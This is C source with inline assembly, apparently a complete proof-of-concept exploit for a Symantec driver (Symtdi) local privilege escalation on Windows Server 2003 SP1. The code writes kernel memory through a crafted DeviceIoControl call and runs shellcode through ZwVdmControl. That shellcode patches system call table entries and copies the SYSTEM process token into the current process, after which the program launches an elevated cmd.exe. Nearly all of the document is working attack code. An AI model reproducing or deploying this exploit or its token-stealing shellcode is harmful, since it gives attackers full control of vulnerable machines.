#include 
#include 

#pragma comment (lib, "ntdll.lib")

typedef LONG NTSTATUS;

#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L) 
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 

typedef struct _IMAGE_FIXUP_ENTRY {

    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

typedef struct _UNICODE_STRING {

 USHORT Length;
 USHORT MaximumLength;
 PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

extern "C"
NTSTATUS 
NTAPI
NtAllocateVirtualMemory(
 IN HANDLE ProcessHandle,
 IN OUT PVOID *BaseAddress,
 IN ULONG ZeroBits,
 IN OUT PULONG AllocationSize,
 IN ULONG AllocationType,
 IN ULONG Protect
 );

int main(int argc, char* argv[])
{
 NTSTATUS status;
 HANDLE deviceHandle;
 DWORD dwReturnSize = 0;
 PVOID VdmControl = NULL;

 PVOID ShellCodeMemory = (PVOID)0x2E352E35;
 DWORD MemorySize = 0x2000;

 PROCESS_INFORMATION   pi;
 STARTUPINFOA    stStartup;

 OSVERSIONINFOEX OsVersionInfo;

 RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
 OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
 GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

 if ( OsVersionInfo.dwMajorVersion != 5 ) {

  printf( "Not NT5 system\n" );
  ExitProcess( 0 );
  return 0;
 }

 if ( OsVersionInfo.dwMinorVersion != 2 ) {
 
  printf( "isn't windows 2003 system\n" );
  ExitProcess( 0 );
  return 0;
 }

 printf( "Symantec Local Privilege Escalation Vulnerability Exploit (POC) \n\n" );
 printf( "Tested on: \n\twindows 2003 sp1 (ntkrnlpa.exe version) \n\n" );
 printf( "\tCoded by Polymorphours. Polymorphours@whitecell.org\n\n" );

 status = NtAllocateVirtualMemory( (HANDLE)-1, 
           &ShellCodeMemory,
           0, 
           &MemorySize, 
           MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
           PAGE_EXECUTE_READWRITE );
 if ( status != STATUS_SUCCESS ) {
 
  printf( "NtAllocateVirtualMemory failed, status: %08X\n", status );
  return 0;
 }

 memset( ShellCodeMemory, 0x90, MemorySize );

 __asm {
 
  call CopyShellCode

  nop
  nop
  nop
  nop
  nop
  nop

  //
  // 恢复SSDT保证系统能够正常运行
  //
/*
  mov edi, 0x80827D54
  mov [edi], 0x808C998A
  mov [edi+4], 0x809ba123
  mov [edi+8], 0x80915CBE
*/ // ntoskrnl.exe

  mov edi, 0x8083100C
  // mov [edi], 0x808C998A
  mov [edi+4], 0x809970CC // ntkrnlpa.exe version
  mov [edi+8], 0x8092FF3E

  mov eax,0xFFDFF124 // eax = ETHREAD  (not 3G Mode)
  mov eax,[eax]

  mov esi,[eax+0x218]
  mov eax,esi

search2k3sp1:

  mov eax,[eax+0x98]
  sub eax,0x98
  mov edx,[eax+0x94]
  cmp edx,0x4 // Find System Process
  jne search2k3sp1

  mov eax,[eax+0xd8] // 获取system进程的token
  mov [esi+0xd8],eax // 修改当前进程的token

  ret 8

CopyShellCode:
  
  pop esi
  lea ecx, CopyShellCode
  sub ecx, esi

  mov edi,0x2E352E35
  cld
  rep movsb
 
 }

 deviceHandle = CreateFile("\\\\.\\Symtdi",
      0,
      FILE_SHARE_READ|FILE_SHARE_WRITE,
      NULL,
      OPEN_EXISTING,
      0,
      NULL);
 if ( INVALID_HANDLE_VALUE == deviceHandle ) {
 
  printf( "Open Symtdi device failed, code: %d\n", GetLastError() );
  return 0;
 } else {
 
  printf( "Open Symtdi device success\n" );
 }

 DeviceIoControl( deviceHandle, 
      0x83022003, 
      NULL,
      0,
      (PVOID)0x8083100C, //ntkrnlpa.exe version // (PVOID)0x80827D54,
      0xC,
      &dwReturnSize,  
      NULL );

 CloseHandle( deviceHandle );

 VdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );
 if ( VdmControl == NULL ) {
 
  printf( "VdmControl == NULL\n" );
  return 0;
 }

 printf( "call shellcode ... " );

 _asm {
 
  xor ecx,ecx
  push ecx
  push ecx
  mov eax, VdmControl
  call eax
 }

 printf( "Done.\n" );
 printf( "Create New Process\n" );

 GetStartupInfo( &stStartup );

 CreateProcess( NULL,
     "cmd.exe",
     NULL,
     NULL,
     TRUE,
     NULL,
     NULL,
     NULL,
     &stStartup,
     &pi );

 return 0;
}